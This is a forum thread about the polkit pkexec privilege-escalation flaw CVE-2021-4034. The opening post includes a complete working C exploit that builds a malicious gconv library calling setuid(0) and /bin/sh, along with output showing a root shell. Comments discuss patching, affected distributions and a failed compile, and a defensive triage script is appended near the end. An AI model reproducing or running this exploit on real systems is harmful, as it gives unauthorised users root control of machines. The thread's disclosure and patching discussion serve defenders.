CVE-2021-4034 - Polkitd privilege escalation (HIGH VULN)
Hi LET community,
A new CVE has come to light in polkit's pkexec calls. It allows any user to become a root user:
The exploit is also given in the example, and it unfortunately works on my Ubuntu 20 machine:
randomuser@node2:~$ gcc test.c -o a
randomuser@node2:~$ ./a
[~] compile helper..
[~] maybe get shell now?
# id
uid=0(root) gid=0(root) groups=0(root),116(lxd),1010(randomuser)
Redhat/CentOS/Alma/etc CVE patch:
Debian/UB CVE patch:
For anyone that wants to try the exploit:
/*
 * blasty-vs-pkexec.c -- by blasty <[email protected]>
 * ------------------------------------------------
 * PoC for CVE-2021-4034, shout out to Qualys
 *
 * ctf quality exploit
 *
 * bla bla irresponsible disclosure
 *
 * -- blasty // 2022-01-25
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>

void fatal(char *f) {
  perror(f);
  exit(-1);
}

void compile_so() {
  FILE *f = fopen("payload.c", "wb");
  if (f == NULL) {
    fatal("fopen");
  }
  char so_code[]=
    "#include <stdio.h>\n"
    "#include <stdlib.h>\n"
    "#include <unistd.h>\n"
    "void gconv() {\n"
    " return;\n"
    "}\n"
    "void gconv_init() {\n"
    " setuid(0); seteuid(0); setgid(0); setegid(0);\n"
    " static char *a_argv[] = { \"sh\", NULL };\n"
    " static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
    " execve(\"/bin/sh\", a_argv, a_envp);\n"
    " exit(0);\n"
    "}\n";
  fwrite(so_code, strlen(so_code), 1, f);
  fclose(f);
  system("gcc -o payload.so -shared -fPIC payload.c");
}

int main(int argc, char *argv[]) {
  struct stat st;
  char *a_argv[]={ NULL };
  char *a_envp[]={
    "lol",
    "PATH=GCONV_PATH=.",
    "LC_MESSAGES=en_US.UTF-8",
    "XAUTHORITY=../LOL",
    NULL
  };
  printf("[~] compile helper..\n");
  compile_so();
  if (stat("GCONV_PATH=.", &st) < 0) {
    if(mkdir("GCONV_PATH=.", 0777) < 0) {
      fatal("mkdir");
    }
    int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777);
    if (fd < 0) {
      fatal("open");
    }
    close(fd);
  }
  if (stat("lol", &st) < 0) {
    if(mkdir("lol", 0777) < 0) {
      fatal("mkdir");
    }
    FILE *fp = fopen("lol/gconv-modules", "wb");
    if(fp == NULL) {
      fatal("fopen");
    }
    fprintf(fp, "module UTF-8// INTERNAL ../payload 2\n");
    fclose(fp);
  }
  printf("[~] maybe get shell now?\n");
  execve("/usr/bin/pkexec", a_argv, a_envp);
}
Comments
Lovely
Wow.
That's quite epic :O
Had to instantly check, no we do not have pkexec installed on our servers
Ah that's great to see
I just updated and tested all my servers; patched 11/14 I own, quite a lot honestly. I'm surprised this isn't a higher CVE rating. Yeah, you can easily patch it without downtime, but the impact can be extreme, because it's this easy to gain root access.
I wonder if going with a minimal install would not include pkexec, making minimal be more secure than non-minimal version of the distro
There was another one just a few days ago https://sysdig.com/blog/cve-2022-0185-container-escape/
I've checked on DirectAdmin and cPanel (CloudLinux version). It was not compiled successfully, since pkexec: command not found in user shell access.
But it successfully got a shell on my VPS, maybe because of this point
But where's the cool name a logo and web site?
Heartbleed, Log4Shell, Spectre - vulnerabilities these days are expected to have a brand.
I suggest...hmmm...maybe PolDancer.
but did you check id once on that shell?
Just checked and none of my Debian 11 VMs are running polkit, or even have the package installed, and the exploit doesn't work there.
My home Deb 11 systems are running polkitd and the exploit works there (just tested).
I'm thinking you need to have a GUI running to have polkitd installed and vulnerable. Might be a Debian config quirk.
At least I don't have to worry about my 12-year-old getting root. She would use ransomware to get a better phone.
I mean, it's not compiled on cloudlinux.
Here's the result:
[user@cpanel test]$ gcc test.c -o a
test.c: In function ‘compile_so’:
test.c:42:9: warning: missing terminating " character [enabled by default]
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL
^
test.c:42:9: error: missing terminating " character
test.c:43:1: error: expected ‘,’ or ‘;’ before ‘}’ token
};\n"
^
test.c:43:1: error: stray ‘\’ in program
test.c:43:5: warning: missing terminating " character [enabled by default]
};\n"
^
test.c:43:1: error: missing terminating " character
};\n"
^
test.c:43:4: error: ‘n’ undeclared (first use in this function)
};\n"
^
test.c:43:4: note: each undeclared identifier is reported only once for each function it appears in
test.c:44:9: error: expected ‘;’ before string constant
" execve(\"/bin/sh\", a_argv, a_envp);\n"
Last year Qualys revealed a similar kind of vulnerability in sudo that had existed for almost a decade. They really like old things. Oops, this is also from last year. The CVE is 2021-4034.
Libvirtd has a dependency on polkit in Debian. VMs might not be vulnerable but the host systems are. I don’t know why this dependency exists, but it is not just a GUI thing
patch state: ✓ all applicable livepatch modules inserted
Premium live patching indeed.
Excellent. Wonderful.
Also Log4j has a companion now.
Why?
We must be due for an Incredible Hulk tv show remake. I'd watch it just to see that bear look real and still thrown across the lake.
Another instance of "if the attackers gain access to the Oval Office, they could do nasty things, omg"
Gcc has to be installed first.
Learning the hard way to "install only what's needed" on your server. Even if the unneeded application doesn't have a bug, it can be used to exploit another app's bug.
Better not use Ubuntu!

Thanks for the exploit example, @FoxelVox
I'm starting to see centos and ubuntu package mirrors getting package updates today. After updating, my CentOS 7 and Ubuntu 20 machines are no longer exploitable. I bet other distros also have updates today.
Why?
because
Well I'm using minimal CentOS, and the exploit unfortunately works. (not so minimal, because I had to install gcc first)
An attacker could always upload that compiled library (payload.so) to a server. gcc is required in the PoC for thoroughness. pkexec should spit out help without any arguments but uses gconv to handle encoding, which can load a library, so gcc really doesn't have any part in how the exploit works.
It's a nasty nasty exploit.
Cue: 999 - Nasty, Nasty
https://youtu.be/4NxXjEPqOls
Yeah. My original thought was just remove polkit or get rid of its root sticky bit permission, but NetworkManager seemed to depend on it. Glad the package updates came so quickly.
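A small triage script for admins following this thread, added here and not part of the thread, blasty's PoC, or polkit itself: it reports the pkexec state people keep checking above (installed? setuid?), counts the filesystem leftovers the PoC creates (a "GCONV_PATH=." directory and a fake gconv-modules file), and offers the setuid-bit removal mentioned as a stopgap. Only the /usr/bin/pkexec path comes from the PoC; the function names, the /home scan root and the --force flag are my assumptions.

```shell
#!/bin/sh
# Added triage helper for CVE-2021-4034: not code from the thread, from blasty, or from polkit.
# Assumes a Linux host with POSIX sh and find(1). The pkexec path and the PoC's leftover names
# (a "GCONV_PATH=." directory, a fake gconv-modules file) are taken from the exploit above.

PKEXEC="${PKEXEC:-/usr/bin/pkexec}"

# Exit status: 0 = pkexec exists with the setuid bit (normally root-owned, so the PoC can
# escalate); 1 = not installed (the "command not found" case in the thread); 2 = present
# but not setuid, so the PoC would only run code as the calling user.
pkexec_setuid_state() {
    f="${1:-$PKEXEC}"
    [ -e "$f" ] || return 1
    [ -u "$f" ] || return 2   # test -u: setuid bit set
    return 0
}

# Print how many PoC-style leftovers sit under a tree: directories whose name starts with
# "GCONV_PATH=" and gconv-modules files outside glibc's own gconv directory.
scan_gconv_artifacts() {
    root="${1:-.}"
    find "$root" \( -type d -name 'GCONV_PATH=*' \) -o \
         \( -type f -name 'gconv-modules' ! -path '*/gconv/*' \) 2>/dev/null | wc -l | tr -d ' '
}

# Stopgap until the vendor package lands: drop the setuid bit, as a comment above suggests.
# Dry-runs unless the second argument is --force; the vendor update restores the bit later.
strip_pkexec_setuid() {
    f="${1:-$PKEXEC}"
    if [ "${2:-}" = "--force" ]; then
        chmod 0755 "$f"
    else
        echo "dry run: would run 'chmod 0755 $f'"
    fi
}

report() {
    s=0; pkexec_setuid_state "$PKEXEC" || s=$?
    case $s in
        0) echo "[!] $PKEXEC is setuid: exposed unless the vendor CVE-2021-4034 update is installed" ;;
        1) echo "[ ] pkexec not installed" ;;
        2) echo "[ ] $PKEXEC present but not setuid: PoC cannot gain root" ;;
    esac
    n=$(scan_gconv_artifacts "${SCAN_ROOT:-/home}")
    echo "[*] $n PoC-style leftovers under ${SCAN_ROOT:-/home}"
}

# Runs the report only when invoked as: sh pkexec-triage.sh --report
if [ "${1:-}" = "--report" ]; then report; fi
```

A setuid pkexec on its own does not prove the box is vulnerable (the patched package is still setuid), so treat the report as a prompt to check the package version, not as a verdict.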
Clicking on random yt link described as "Nasty, Nasty" is rarely a good idea.